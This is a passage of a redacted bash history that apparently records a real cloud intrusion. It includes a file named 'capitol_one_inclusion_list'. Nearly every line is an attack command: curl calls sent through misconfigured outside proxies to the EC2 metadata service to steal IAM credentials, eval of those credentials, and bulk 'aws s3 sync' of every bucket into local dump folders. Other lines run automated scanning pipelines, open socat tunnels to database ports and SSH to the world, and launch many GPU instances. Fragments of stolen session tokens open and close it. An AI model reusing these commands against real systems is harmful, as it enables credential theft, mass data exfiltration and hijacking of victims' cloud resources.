pb1gazvgt8kofOqsU+DoXrymrI2N6U/VU54PdWlWUEkBRgSmToQa9hvTD9rNwDwrwwXSEABACx4NHRBp9v/F26n7K4y4YvqLiBWLSVCvsF2
VJcJo7oqVotefr41FeBlXRWif/n26abhdE4pacHGPSsTZLdD/ihzfvxqqjaus8U2siIeeE0iEr9VakH9QOr+WfZAiCaN5IUQXHbmt40NGB1
f++4b7EUy9IztVftaxOijHJKXlPSHRLgl4MTK2DcRDpPrTmx/ojG2N0Qcj+ThhQTnTZGgPjqs1r2M4ry6VUTHtsaG7q/aKLGAuHKporX6Um
zYo1KzU5AU=",\n  "Expiration" : "2019-03-22T23:40:17Z"\n}'  | awsession.sh

```
4662  aws ec2 describe-instances --region eu-central-1
4663  aws ec2 describe-instances --region eu-central-1 | less
4664  aws ec2 create-key-pair --region us-east-1 --key-name default
4711  curl -Lsk --fail --proxy-insecure --proxy https://34.234.188.25:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/              | awssession.sh
4719  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='               /{}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
4729  mkdir aws_dumps
4730  sudo mv            /mnt/export/aws_dumps
4731  sudo mv         /mnt/export/aws_dumps
4732  sudo mv              /mnt/export/aws_dumps
4733  sudo mv            /mnt/export/aws_dumps
4734  mv             /mnt/export/aws_dumps
4735  sudo omv              /mnt/export/aws_dumps
4736  sudo mv            /mnt/export/aws_dumps
4737  mv         /mnt/export/aws_dumps
4738  sudo mv        /mnt/export/aws_dumps
4740  mv             /mnt/export/aws_dumps
4741  sudo mv              mnt/export/aws_dumps
4742  sudo mv             /mnt/export/aws_dumps
4743  sudo mv              /mnt/export/aws_dumps
4744  sudo mv           /mnt/export/aws_dumps
4745  sudo mv             /mnt/export/aws_dumps
4746  sudo mv            /mnt/export/aws_dumps
4747  sudo mv         /mnt/export/aws_dumps
4748  sudo mv         /mnt/export/aws_dumps
4749  sudo mv           /mnt/export/aws_dumps
4750  mv          /mnt/export/aws_dumps/webrole2_s3
4751  mv                 /mnt/export/aws_dumps/infobloxcto
4752  mv           /mnt/export/aws_dumps
4753  mv                   /mnt/export/aws_dumps
4754  sudo mv                /mnt/export/aws_dumps
4759  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
ami-            0e791 --associate-public-ip-address --security-group-id sg-       0db7
--instance-initiated-shutdown-behavior terminate --key-name default2
4777  eval `curl -Lsk --fail --proxy-insecure --proxy http://50.18.218.236:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/                        |
awssession`
4778  eval `curl -Lsk --fail --proxy-insecure --proxy http://50.18.218.236:80
```

```
        http://169.254.169.254/latest/meta-data/iam/security-credentials/                        |
        awssession.sh`
 4780   eval `curl -Lsk --fail --proxy-insecure --proxy https://54.214.50.238:443
        http://169.254.169.254/latest/meta-data/iam/security-credentials/           | awssession.sh`
 4782   eval `curl -Lsk --fail --proxy-insecure --proxy http://34.197.114.244:80
        http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
 4788   tree
 4814   eval `curl -Lsk --fail --proxy-insecure --proxy http://52.0.198.32:443
        http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
 4815   aws sts curl -Lsk --fail --proxy-insecure --proxy http://52.0.198.32:443
        http://169.254.169.254/latest/meta-data/iam/security-credentials/
 4819   eval `curl -Lsk --fail --proxy-insecure --proxy https://52.0.198.32:443
        http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
 4820   aws ec2 describe-security-groups
 4828   eval `curl -Lsk --fail --proxy-insecure --proxy https://52.208.97.11:443
        http://169.254.169.254/latest/meta-data/iam/security-credentials/                    |
        awssession.sh`
 4829   aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='"       /{}"' \;
        mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
 4850   cd awsconfig
 4862   eval `curl -Lsk --fail --proxy-insecure --proxy http://34.197.114.244:80
        http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
 4863   aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir=''          /{}"'
        \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
 4879   eval `curl -Lsk --fail --proxy-insecure --proxy https://34.201.163.169:443
        http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
 4880   eval `curl -Lsk --fail --proxy-insecure --proxy https://34.201.163.169:443
        http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
 4881   eval `curl -Lsk --fail --proxy-insecure --proxy https://34.201.163.169:443
        http://169.254.169.254/latest/meta-data/iam/security-credentials/                    |
        awssession.sh`
 4884   eval `curl -Lsk --fail --proxy-insecure --proxy https://34.201.163.169:443
        http://169.254.169.254/latest/meta-data/iam/security-credentials/              | awssession.sh`
 4885   eval `curl -Lsk --fail --proxy-insecure --proxy https://54.164.114.241:443
        http://169.254.169.254/latest/meta-data/iam/security-credentials/                | awssession.sh`
 4886   aws ec2 describe-instaces --region us-eat-1
 4887   aws ec2 describe-instaces --region us-east-1
 4890   aws ec2 describe-instances --region us-east-1 >
 4891   aws ec2 describe-instances --region us-west-2 >
```

```
 4894   aws sts assume-role --role-arn "arn:aws:iam::        6483:instance-profile/                          "
 4895   aws sts assume-role --role-arn "arn:aws:iam::        6483:instance-profile/                          "
--role-session-name
 4896   aws sts assume-role --role-arn "arn:aws:iam::        6483:instance-profile/                          "
--role-session-name '      '
 4897   aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id ami-     90d3
--associate-public-ip-address
 4898   aws ec2 run-instances --region us-east-1 --instance-type t3.micro --count 1 --image-id ami-     90d3
--associate-public-ip-address
 4931   grep -ri seattle ~/aws_scan/capitol_one_inclusion_list
 4932   grep -ri seattle . > ~/aws_scan/capitol_one_inclusion_list
 4933   less ~/aws_scan/capitol_one_inclusion_list
 4934   nano ~/aws_scan/id
 4977   aws describe-instances --region ap-southeast-2
 4987   aws describe-instances
 4988   aws ec2 describe-instances --region ap-southeast-2
 4989   aws ec2 terminate-instances --instance-ids i-            537e
 4990   aws ec2 terminate-instances --instance-ids i-            537e --region ap-southeast-2
 5011   aws ec2 run-instances --region us-west-2 --instance-type a1.4xlarge --keyname default3 --count 1
--image-id ami-     90d3 --associate-public-ip-address
 5012   aws ec2 run-instances --region us-west-2 --instance-type a1.4xlarge --key-name default3 --count 1
--image-id ami-     90d3 --associate-public-ip-address
 5013   aws ec2 run-instances --region us-west-2 --instance-type a1.4xlarge --key-name default3 --count 1
--image-id ami-            )ce49 --associate-public-ip-address
 5014   cd aws describe-instances --region us-west-2
 5015   aws ec2 describe-security-groups --group-ids sg-      bdac
 5016   aws ec2 describe-security-groups --group-ids sg-      bdac --region us-west-2
 5017   aws ec2 authorize-security-group-ingress --group-id sg-      bdac --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
 5018   cd /home/erratic/aws_scan
 5020   eval `curl -Lsk --fail --proxy-insecure --proxy https://52.50.114.108:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                          | awssession.sh`
 5022   eval `curl -Lsk --fail --proxy-insecure --proxy https://35.168.232.110:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/ | awssession.sh`
 5024   aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='               {}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
 5026   find . -name "*            *"
 5028   cp             zip tmp
 5029   unzip             .zip
```

```
 5038   nslookup
 5039   curl -Lsk --fail --proxy-insecure --proxy https://35.168.232.110:443
http:/
 5040   curl -Lsk --fail --proxy-insecure --proxy https://35.168.232.110:443
http://                                             -vvv
 5041   socat TCP-L:6000,reuseaddr,fork
PROXY:35.168.232.110:                                  :3306,proxyport=443,retry=10 2>
/dev/null &
 5043   socat TCP-L:6001,reuseaddr,fork
PROXY:localhost:                                 3306,proxyport=6000,retry=10  &
 5052   socat TCP-L:6001,reuseaddr,fork
PROXY:localhost:                               :5432,proxyport=6000,retry=10  &
 5079   eval `curl -Lsk --fail --proxy-insecure --proxy https://35.168.232.110:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                     |
awssession.sh`
 5082   eval `curl -Lsk --fail --proxy-insecure --proxy http://3.120.251.179:80
http://169.254.169.254/latest/meta-data/iam/security-credentials,                     |
awssession.sh `
 5085   val `curl -Lsk --fail --proxy-insecure --proxy https://63.32.127.100:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/   _            | awssession.sh`
 5086   aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='"                    /{}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
 5087   eval `curl -Lsk --fail --proxy-insecure --proxy https://63.32.127.100:443
http://169.254.169.254/latest/meta-data/iam/security-credentials         | awssession.sh`
 5094   cd /home/erratic/aws_scan/metadata
 5190   mv ../try_create_keypair.sh ../aquire_aws_info.sh
 5196   aws ec2 describe-regions
 5199   aws ec2 describe-regions | jq -r '.Regions | .[] | .RegionName'
 5204   man aws
 5209   grep -r ami-id | sed 's/:ami-id//g' | sed 's/.*:443/https\:\/\/\0/g' | sed '/.*:443/!
s/.*/http:\/\/\0/g' | parallel --tag curl --connect-timeout 1 -m 5 -Lsk --fail --proxy-insecure --proxy {}
http://169.254.169.254/latest/meta-data/iam/security-credentials '&&' echo -e '"\n"' | tr '\t' ' ' | grep
"." | awk 'NF==2 {print $0}'| parallel --colsep ' ' ../../aquire_aws_info.sh {1} {2}
 5215   grep -r ami-id | sed 's/:ami-id//g' | sed 's/.*:443/https\:\/\/\0/g' | sed '/.*:443/!
s/.*/http:\/\/\0/g' | parallel --tag curl --retry 2 --connect-timeout 1 -m 5 -Lsk --fail --proxy-insecure
--proxy {} http://169.254.169.254/latest/meta-data/iam/security-credentials '&&' echo -e '"\n"' | tr '\t' '
' | grep "." | awk 'NF==2 {print $0}'| parallel --colsep ' ' ../../aquire_aws_info.sh {1} {2}
 5220   aws iam
 5221   aws iam  help
```

608-023

```
 5262  nano ../aquire_aws_info.sh
 5263  nano ../aquire_aws_info.sh 0w
 5264  nano ../aquire_aws_info.sh -w
 5265  grep -r ami-id | sed 's/:ami-id//g' | sed -e 's/<[^>]*>//g' | sed 's/.*:443/https\:\/\/\0/g' | sed
'/.*:443/! s/.*/http:\/\/\0/g' | parallel --tag curl --retry 2 --connect-timeout 1 -m 5 -Lsk --fail
--proxy-insecure --proxy {} http://169.254.169.254/latest/meta-data/iam/security-credentials '&&' echo -e
'"\n"' | tr '\t' ' ' | sed -e 's/<[^>]*>//g' | grep "." | awk 'NF==2 {print $0}'| parallel --colsep ' '
../../aquire_aws_info.sh {1} {2}
 5274  cat mega_metadata.txt | sed 's/:ami-id//g' | sed -e 's/<[^>]*>//g' | sed 's/.*:443/https\:\/\/\0/g'
| sed '/.*:443/! s/.*/http:\/\/\0/g' | parallel --tag curl --retry 2 --connect-timeout 1 -m 5 -Lsk --fail
--proxy-insecure --proxy {} http://169.254.169.254/latest/meta-data/iam/security-credentials '&&' echo -e
'"\n"' | tr '\t' ' ' | sed -e 's/<[^>]*>//g' | grep "." | awk 'NF==2 {print $0}'| parallel --colsep ' '
../../aquire_aws_info.sh {1} {2}
 5287  cat mega_metadata.txt | sed -e 's/<[^>]*>//g' | tr '/' ' '  | awk '{print $NF}' | grep -v Idea | sed
's/.metadata.:/g' | sort | uniq | sed 's/:ami-id//g' | sed -e 's/<[^>]*>//g' | sed
's/.*:443/https\:\/\/\0/g' | sed '/.*:443/! s/.*/http:\/\/\0/g' | parallel --tag curl --retry 2
--connect-timeout 1 -m 5 -Lsk --fail --proxy-insecure --proxy {}
http://169.254.169.254/latest/meta-data/iam/security-credentials '&&' echo -e '"\n"' | tr '\t' ' ' | sed -e
's/<[^>]*>//g' | grep "." | awk 'NF==2 {print $0}'| parallel --colsep ' ' ../../aquire_aws_info.sh {1} {2}
 5292  curl -Lsk --fail --proxy-insecure --proxy https://63.33.58.7:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh
 5293  eval `curl -Lsk --fail --proxy-insecure --proxy https://63.33.58.7:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
 5294  eval `curl -Lsk --fail --proxy-insecure --proxy https://63.33.58.7:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/             | awssession.sh`
 5295  eval `curl -Lsk --fail --proxy-insecure --proxy https://18.195.92.229:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/             | awssession.sh`
 5296  eval `curl -Lsk --fail --proxy-insecure --proxy https://18.196.151.118:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/          |
awssession.sh`
 5297  eval `curl -Lsk --fail --proxy-insecure --proxy https://18.196.151.118:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/             | awssession.sh`
 5300  eval `curl -Lsk --fail --proxy-insecure --proxy https://18.196.151.118:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/           | awssession.sh`
 5301  eval `curl -Lsk --fail --proxy-insecure --proxy https://18.196.151.118:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/             | sed -e 's/<[^>]*>//g'
| awssession.sh`
 5304  eval `curl -Lsk --fail --proxy-insecure --proxy http://3.88.201.19:81 http://localhost:8001
http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
```

```
5311  eval `curl -Lsk --fail --proxy-insecure --proxy http://3.89.177.190:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
       | sed -e 's/<[^>]*>//g' | awssession.sh`
5312  eval `curl -Lsk --fail --proxy-insecure --proxy http://50.18.218.236:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/                | sed
-e 's/<[^>]*>//g' | awssession.sh`
5313  eval `curl -Lsk --fail --proxy-insecure --proxy http://52.199.114.150:8001
http://169.254.169.254/latest/meta-data/iam/security-credentials/              | sed -e
's/<[^>]*>//g' | awssession.sh`
5315  curl


5316  eval `curl -Lsk --fail --proxy-insecure --proxy http://52.7.126.48:8888
http://169.254.169.254/latest/meta-data/iam/security-credentials/            | sed -e
's/<[^>]*>//g' | awssession.sh`
5361  eval `curl -Lsk --fail --proxy-insecure --proxy https://63.34.191.165:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/              | awssession.sh`
5362  eval `curl -Lsk --fail --proxy-insecure --proxy https://63.34.191.165:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/         |
awssession.sh`
5364  eval `curl -Lsk --fail --proxy-insecure --proxy https://63.34.191.165:443
http://169.254.169.254/latest/meta-data/iam/security-credentials        | awssession.sh`
5367  eval `curl -Lsk --fail --proxy-insecure --proxy http://54.94.134.172:9050
http://169.254.169.254/latest/meta-data/iam/security-credentials/              |
awssession.sh`
5369  mv              /mnt/export/aws_dumps
5370  mv              /mnt/export/aws_dumps/
5371  sudo mv              /mnt/export/aws_dumps/
5372  mv              /mnt/export/aws_dumps/
5373  mv              /mnt/export/aws_dumps/
5374  sudo mv              /mnt/export/aws_dumps/
5375  sudo mv              /mnt/export/aws_dumps/
5376  sudo mv              /mnt/export/aws_dumps
5377  sudo mv              /mnt/export/aws_dumps/
5378              /export/aws_dumps
5386  cat
5414  aws --profile       describe-instances
5415  aws --profile       describe-instances
5416  aws --profile       describe-instances
```

```
5417  aws --profile          describe-instances --region eu-west-1
5418  aws --profile          describe-instances --region eu-west-1\n
5437  aws --profile          ec2 describe-instances --region us-west-1
5446  aws --profile          list-templates
5447  aws --profile          ses list-templates
5448  aws --profile          ses list-templates --region us-east-1
5515  eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.161.43.11:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
5516  aws ec2 describe-instances --region eu-west-1 | jq '.Reservations | .[] | .Instances | .[] |
.InstanceType'
5517  aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 1 --image-id
ami-          4a80 --associate-public-ip-address --security-group-ids sg-      706e
--instance-initiated-shutdown-behavior terminate --key-name default
5518  aws ec2 run-instances --region eu-west-1 --instance-type p2.16xlarge --count 2 --image-id
ami-          4a80 --associate-public-ip-address --security-group-ids sg-      706e
--instance-initiated-shutdown-behavior terminate --key-name default
5519  aws ec2 run-instances --region eu-west-1 --instance-type p3.2xlarge --count 2 --image-id
ami-          4a80 --associate-public-ip-address --security-group-ids sg-      706e
--instance-initiated-shutdown-behavior terminate --key-name default
5520  aws ec2 run-instances --region eu-west-1 --instance-type p2.16xlarge --count 1 --image-id
ami-          1a80 --associate-public-ip-address --security-group-ids sg-      706e
--instance-initiated-shutdown-behavior terminate --key-name default
5521  aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 3 --image-id
ami-          4a80 --associate-public-ip-address --security-group-ids sg-      706e
--instance-initiated-shutdown-behavior terminate --key-name default
5522  aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 2 --image-id
ami-          4a80 --associate-public-ip-address --security-group-ids sg-      706e
--instance-initiated-shutdown-behavior terminate --key-name default
5523  aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 1 --image-id
ami-          4a80 --associate-public-ip-address --security-group-ids sg-      706e
--instance-initiated-shutdown-behavior terminate --key-name default
5524  aws ec2 run-instances --region eu-west-1 --instance-type p2.2xlarge --count 1 --image-id
ami-          4a80 --associate-public-ip-address --security-group-ids sg-      706e
--instance-initiated-shutdown-behavior terminate --key-name default
5525  aws ec2 run-instances --region eu-west-1 --instance-type p2.xlarge --count 1 --image-id
ami-          4a80 --associate-public-ip-address --security-group-ids sg-      706e
--instance-initiated-shutdown-behavior terminate --key-name default
5526  aws ec2 run-instances --region eu-west-1 --instance-type p3.xlarge --count 1 --image-id
ami-          4a80 --associate-public-ip-address --security-group-ids sg-      706e
```

```
      --instance-initiated-shutdown-behavior terminate --key-name default
 5536   aws ec2 run-instances --region eu-west-1 --instance-type p3dn.24xlarge --count 2 --image-id
ami            4a80 --associate-public-ip-address --security-group-ids sg    706e
--instance-initiated-shutdown-behavior terminate --key-name default
 5537   aws ec2 run-instances --region eu-west-1 --instance-type g3.16xlarge --count 2 --image-id
ami            4a80 --associate-public-ip-address --security-group-ids sg-    706e
--instance-initiated-shutdown-behavior terminate --key-name default
 5538   aws ec2 run-instances --region eu-west-1 --instance-type g3.8xlarge --count 2 --image-id
ami            4a80 --associate-public-ip-address --security-group-ids sg-    706e
--instance-initiated-shutdown-behavior terminate --key-name default
 5539   aws ec2 run-instances --region eu-west-1 --instance-type g3.2xlarge --count 2 --image-id
ami            4a80 --associate-public-ip-address --security-group-ids sg    706e
--instance-initiated-shutdown-behavior terminate --key-name default
 5540   aws ec2 run-instances --region eu-west-1 --instance-type g3.4xlarge --count 2 --image-id
ami-           4a80 --associate-public-ip-address --security-group-ids sg-    706e
--instance-initiated-shutdown-behavior terminate --key-name default
 5541   aws ec2 run-instances --region eu-west-1 --instance-type g3s.xlarge --count 2 --image-id
ami            4a80 --associate-public-ip-address --security-group-ids sg    706e
--instance-initiated-shutdown-behavior terminate --key-name default
 5542   aws ec2 describe-instances --region eu-west-1 | jq '.Reservations | .[] | .Instances | .[] |
[.InstanceType, .PublicIpAddress]'
 5560   eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.57.176.179:443
http://169.254.169.254/latest/meta-data/iam/security-credentials.          | awssession.sh`
 5561   aws ec2 desrcribe-instances
 5562   aws ec2 descrcribe-instances
 5564   eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.209.220.55:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
 5678   mkdir awstmp
 5679   cat 11-3-19 11-3-19.443.log 11-3-19.non443.log 14-03.19 14-03-19.non443.log 22.03.19 23-03-19.ami-id
26.03.19 27.03.19 28.03.19 30.03.19 3-20-19 3-20-19.ssl 7-03-19 7-03-19.443.log 7-03-19.non443.log
9-03-19.443.log 9-3-19 9-3-19.non443.log | grep -B 4 Arn | grep curl | tr -d '}' | sed -e 's/<[^>]*>//g' |
parallel --tag {} -o awstmp/{}.log
 5680   cd awstmp
 5704   eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.10.40.107:3129
http://169.254.169.254/latest/meta-data/iam/security-credentials,                        |
awssession.sh`
 5706   eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.50.114.108:443
```

```
     http://169.254.169.254/latest/meta-data/iam/security-credentials/                | awssession.sh`
  5707  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://18.195.92.229:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                | awssession.sh`
  5709  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://63.32.127.100:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/              |
awssession.sh`
  5750  cp /home/erratic/aws_scan/new_all.xz .
  5761

  5762  curl

  5763  curl

  5768  curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.10.40.107:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/
  5773  aws --profile           --region us-east-1 ec2 describe-instances
  5774  cat                          .json
  5860  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.57.176.179:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/           |
awssession.sh`
  5871  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='          '{}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
  5890  cat /home/erratic/aws_scan/mega_metadata.txt | sed -e 's/<[^>]*>//g' | tr '/' ' ' | awk '{print
$NF}' | grep -v Idea | sed 's/.metadata./:/g' | sort | uniq | sed 's/:ami-id//g' | sed -e 's/<[^>]*>//g' |
sed 's/.*:443/https\:\/\/\0/g' | sed '/.*:443/! s/.*/http:\/\/\0/g' | parallel --tag curl --retry 2
--connect-timeout 1 -m 5 -Lsk --fail --proxy-insecure --proxy {}
http://169.254.169.254/latest/meta-data/iam/info
  5891  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.250.92.179:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/                |
awssession.sh`
  5892  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.250.92.179:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/                |
awssession.sh`
```

```
 5893  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://63.33.58.7:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/              |
awssession.sh`
 5894  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://63.34.213.125:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                       |
awssession.sh`
 5896  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://63.34.213.125:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
 | awssession.sh`
 5897  aws ec2 s3api list-buckets
 5900  if [ "$AWS_DEFAULT_REGION" = "eu-west-1" ]; then aws configure set s3.signature_version s3v4; fi
 5901  aws s3 cp                                        .sh ~/\n
 5905  aws s3 sync
 5914  cat awslogs.conf
 5915  cat awslogs.conf | less
 5946  cat /home/erratic/aws_scan/mega_metadata.txt | sed -e 's/<[^>]*>//g' | tr '/' ' '  | awk '{print
$NF}' | grep -v Idea | sed 's/.metadata./:/g' | sort | uniq | sed 's/:ami-id//g' | sed -e 's/<[^>]*>//g' |
sed 's/.*:443/https\:\/\/\0/g' | sed '/.*:443/! s/.*/http:\/\/\0/g' | parallel --tag curl --retry 2
--connect-timeout 1 -m 5 -Lsk --fail --proxy-insecure --proxy {}
http://169.254.169.254/latest/meta-data/iam/info | less
 5947  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.193.62.96:3128 http://169.254.169.254/latest/meta-data/iam/security-credentials/
 | awssession.sh`
 5949  aws ec2 create-key-pair --region us-west-2
 5952  aws ec2 describe-security-groups --region us-west-2
 5953  aws ec2 run-instances --region eu-west-1 --instance-type p3dn.24xlarge --count 2 --image-id
ami-            4a80 --associate-public-ip-address --security-group-ids sg-      4980
--instance-initiated-shutdown-behavior terminate --key-name default
 5954  aws ec2 run-instances --region eu-west-1 --instance-type p3dn.24xlarge --count 2 --image-id
ami-            4a80 --associate-public-ip-address --security-group-ids sg-      3f8
--instance-initiated-shutdown-behavior terminate --key-name default
 5956  aws ec2 run-instances --region eu-west-1 --instance-type p3dn.24xlarge --count 2 --image-id
ami-            4a80 --associate-public-ip-address --security-group-ids sg-      ad64
--instance-initiated-shutdown-behavior terminate --key-name default
 5957  aws ec2 describe-network-
 5958  aws ec2 describe-network-      --region us-west-2
 5959  aws ec2 run-instances --region eu-west-1 --instance-type p3dn.24xlarge --count 2 --image-id
ami-            4a80 --associate-public-ip-address --security-group-ids sg-      ad64
```

```
     --instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-     761f
 5960   aws ec2 run-instances --region us-west-2 --instance-type p3dn.24xlarge --count 2 --image-id
ami-            4a80 --associate-public-ip-address --security-group-ids sg-     ad64
--instance-initiated-shutdown-behavior terminate --key-name default
 5961   aws ec2 run-instances --region us-west-2 --instance-type p3dn.24xlarge --count 2 --image-id
\tami-           8109 --associate-public-ip-address --security-group-ids sg-     ad64
--instance-initiated-shutdown-behavior terminate --key-name default
 5962   aws ec2 run-instances --region us-west-2 --instance-type p3dn.24xlarge --count 2 --image-id
\tami-           8109 --associate-public-ip-address --instance-initiated-shutdown-behavior terminate
--key-name default
 5963   aws ec2 run-instances --region us-west-2 --instance-type p3dn.24xlarge --count 2 --image-id
\tami-           8109 --associate-public-ip-address --security-group-ids sg-     ad64
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-     761f
 5964   aws ec2 run-instances --region us-west-2 --instance-type p3dn.24xlarge --count 2 --image-id
\tami-           8109 --associate-public-ip-address --security-group-ids sg-     ad64
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-     22da
 5965   aws ec2 run-instances --region us-west-2 --instance-type p3dn.24xlarge --count 2 --image-id
\tami-           3109 --associate-public-ip-address --security-group-ids sg-     ad64
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-    ee04
 5966   aws ec2 run-instances --region us-west-2 --instance-type p3dn.24xlarge --count 2 --image-id
\tami-           8109 --associate-public-ip-address --security-group-ids sg-     43f8
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-    ee04
 5967   aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
\tami-           8109 --associate-public-ip-address --security-group-ids sg-     43f8
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-    ee04
 5968   aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 2 --image-id
\tami-           8109 --associate-public-ip-address --security-group-ids sg-     43f8
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-    ee04
 5969   aws ec2 run-instances --region us-west-2 --instance-type p3.2xlarge --count 2 --image-id
\tami-           3109 --associate-public-ip-address --security-group-ids sg-     43f8
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-    ee04
 5970   aws ec2 describe-instances --region eu-west-1 | jq '.Reservations | .[] | .Instances | .[] |
.PublicIpAddress' --region us-west-2
 5971   aws ec2 describe-instances --region eu-west-1 --region us-west-2 | jq '.Reservations | .[] |
.Instances | .[] | .PublicIpAddress'
 5975   aws ec2 authorize-security-group-ingress --group-id sg-     43f8 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
 5992   aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='                         "' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
```

```
6021  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.220.54.110:8181
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                         | awssession.sh`
6032  tar -cvf ~/aws.tar ~/.aws
6034  mv      .sh ~/aws_scan
6035  cd ~/aws_scan
6042  nano ~/.aws/                    json
6052  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.220.54.110:8181
http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/        |
awssession.sh`
6068  eval `echo -e '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-04-06T01:24:59Z",\n  "Type" :
"        ",\n  "AccessKeyId" : "                    3RWD",\n  "SecretAccessKey" :
"                    gEbe ,\n  "Token" :
```

"AgoJb3JpZ2luX2VjEEIaDGV1LWNlbnRyYWwtMSJGMEQCIGawD1aJ12AhHHMzNYi2IETwnca61zGowdidI+ONSYMHAiBEQY6J+WhHw0oRUt
hABzg8UdjZ68pnmI3ElAZaPQxuPyrpAwj7//////////8BEAAaDDkwOTQzNTQ1NTNzIwMyIMezwTTfX+av2tB2vbKr0DEXu3tf5Oyn4rFXGVw
